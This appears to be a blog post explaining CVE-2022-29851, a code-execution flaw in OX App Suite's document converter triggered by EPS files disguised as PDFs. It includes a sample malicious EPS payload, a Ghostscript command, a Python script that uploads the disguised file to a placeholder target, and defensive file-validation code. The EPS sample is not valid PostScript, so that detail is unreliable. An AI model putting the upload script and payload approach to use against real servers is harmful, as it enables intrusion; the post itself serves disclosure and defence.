When it comes to office apps and webmail solutions, business users love OX App Suite for its open-source, flexible approach. But in 2022, a security hole was found that could let attackers run their own code on your server—sometimes just by sending a disguised PDF file. This post takes you through CVE-2022-29851: what happened, how it works, technical details, and how to stay safe.
The Basics: What Was Vulnerable?
OX App Suite's documentconverter service lets users convert files from one format to another, e.g., turning a Word document into a PDF or rendering a PDF as an image preview. Many businesses run this as part of their OX mail or groupware deployment.
The problem?
Under certain configurations, specifically when the system is set up to use Ghostscript, an attacker could craft a file that looks like a PDF, but is actually an EPS (Encapsulated PostScript) file, embedding dangerous commands. When the OX document converter processed this file, it would launch Ghostscript and, unknowingly, run the commands inside, giving hackers a way to inject and execute code on the server.
Conversion Request:
- The attacker uploads or submits the disguised file for conversion (for example, converting "PDF" to an image).
Ghostscript Called with Wrong Filter:
- The documentconverter backend, using Ghostscript, doesn’t check the real file type before sending it to the conversion tools.
Command Executed on Server:
- If Ghostscript isn't running with certain security flags, or if OX isn’t limiting file types correctly, *the attacker's code can run on the OS with the privileges of the process*.
What Exactly is Encapsulated PostScript (EPS)?
EPS is a “programming” file type, not just an image: you can embed code in it and, when interpreted, those commands *can do things like write files, download and run programs, etc.* This is why EPS support has always been tricky for document processors.
Sample Exploit: How Code Gets In
Here’s a simplified sample malicious EPS file. Imagine this EPS tries to write the word "hacked" into /tmp/hacked.txt:
%!PS
system("echo hacked > /tmp/hacked.txt")
showpage
The attacker saves this as payload.pdf. When converted, Ghostscript gets called like this:
gs -dSAFER -dBATCH -dNOPAUSE -sDEVICE=pngalpha -sOutputFile=output.png payload.pdf
> If Ghostscript isn't locked down correctly, that system("...") line *actually runs* on the server.
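The check that the converter flow above is missing is a content check: the declared name and MIME type say "PDF", but the bytes say PostScript. The following is an added example written for this post, not OX App Suite's documentconverter code and not part of Ghostscript; it sniffs the leading bytes of the upload, refuses anything that is not really a PDF (including a polyglot that carries a PostScript header behind a PDF one), and only then builds the sandboxed Ghostscript command line shown above. The function names, the sample byte strings and the 1024-byte sniff window are assumptions made for the example.

```python
import subprocess
from pathlib import Path

# Well-known file headers: a PDF starts with "%PDF-", a PostScript/EPS file with "%!PS".
PDF_MAGIC = b"%PDF-"
PS_MAGIC = b"%!PS"
SNIFF_WINDOW = 1024  # assumed: how many leading bytes we inspect for a PostScript header


def sniff_type(data: bytes) -> str:
    """Classify an upload by its content, ignoring the filename and declared MIME type.

    A PostScript header anywhere in the leading block wins over a PDF header at
    offset 0, so a "%PDF-" line followed by "%!PS" (a polyglot) is still rejected.
    """
    head = data[:SNIFF_WINDOW]
    if PS_MAGIC in head:
        return "postscript"
    if head.startswith(PDF_MAGIC):
        return "pdf"
    return "unknown"


def validate_for_conversion(filename: str, declared_mime: str, data: bytes):
    """Accept a conversion request only when name, MIME type and magic bytes all say PDF.

    Returns (accepted, reason) so the caller can log why an upload was refused.
    """
    if not filename.lower().endswith(".pdf") or declared_mime != "application/pdf":
        return False, f"declared type mismatch: name={filename!r} mime={declared_mime!r}"
    actual = sniff_type(data)
    if actual != "pdf":
        return False, f"content is {actual}, not PDF: refusing to hand it to Ghostscript"
    return True, "ok"


def build_ghostscript_argv(input_path: str, output_path: str) -> list:
    """Build the Ghostscript command line from the post, as an argv list (no shell).

    -dSAFER restricts file access from PostScript operators; -dNOPROMPT and -dBATCH
    keep the interpreter from waiting on interactive input.
    """
    return [
        "gs", "-dSAFER", "-dBATCH", "-dNOPAUSE", "-dNOPROMPT",
        "-sDEVICE=pngalpha",
        f"-sOutputFile={output_path}",
        str(input_path),
    ]


def convert_pdf_to_png(upload_name: str, declared_mime: str, data: bytes, workdir: Path):
    """Validate first, then run Ghostscript; raises ValueError on a rejected upload."""
    accepted, reason = validate_for_conversion(upload_name, declared_mime, data)
    if not accepted:
        raise ValueError(reason)
    src = workdir / "input.pdf"  # never reuse the attacker-supplied filename on disk
    dst = workdir / "output.png"
    src.write_bytes(data)
    subprocess.run(build_ghostscript_argv(str(src), str(dst)), check=True, timeout=60)
    return dst


# Constructed sample inputs (not real files from the advisory).
GOOD_PDF = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"
DISGUISED_EPS = b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 10 10\nshowpage\n"
POLYGLOT = b"%PDF-1.4\n%!PS\nshowpage\n"

if __name__ == "__main__":
    for name, blob in [("report.pdf", GOOD_PDF), ("payload.pdf", DISGUISED_EPS), ("mixed.pdf", POLYGLOT)]:
        print(name, validate_for_conversion(name, "application/pdf", blob))
```

The decisive line is the magic-byte check: the Python upload script later in this post passes a name of payload.pdf and a MIME type of application/pdf, and both of those are attacker-controlled, so a converter that trusts either is trusting the attacker. Sniffing the bytes and refusing anything PostScript-shaped closes that gap regardless of how Ghostscript itself is configured.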
Here’s a Python script that submits a disguised EPS as a PDF for conversion:
import requests
with open('payload.pdf', 'rb') as f:
    files = {
        'file': ('payload.pdf', f, 'application/pdf')
    }
    response = requests.post('https://target-domain.com/appsuite/api/convert', files=files)
print(response.status_code, response.text)
If the target OX App Suite uses the vulnerable documentconverter and is misconfigured, the attacker's code runs!
Who Was at Risk?
- Not All Installs: OX App Suite setups running documentconverter AND using Ghostscript AND allowing untrusted file uploads/conversions.
- Not the Default: This was not the *default* config, but many setups use Ghostscript for better format support.
If you run OX App Suite documentconverter:
- Update to OX App Suite v7.10.6 or later (OX security advisory)
References & Reading
- CVE-2022-29851 at NVD
- OX Security Advisory - Release Notes and Security Fixes (7.10.6 Rev3)
- Ghostscript Security (Upstream advice)
- OX App Suite Official Site
Final Thoughts
CVE-2022-29851 is a classic reminder: never trust user-supplied files, always check what’s inside, and don’t let legacy file types like EPS or PostScript anywhere near critical conversion tools—unless you’re certain you’re safe. Updates, configuration checks, and strong file validation are your friends.
*If you run OX App Suite or similar platforms, check your configs, patch your software, and be cautious around document conversion. Hackers love these hidden moves—don’t let them get the last laugh!*
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/26/2022 02:11:00 UTC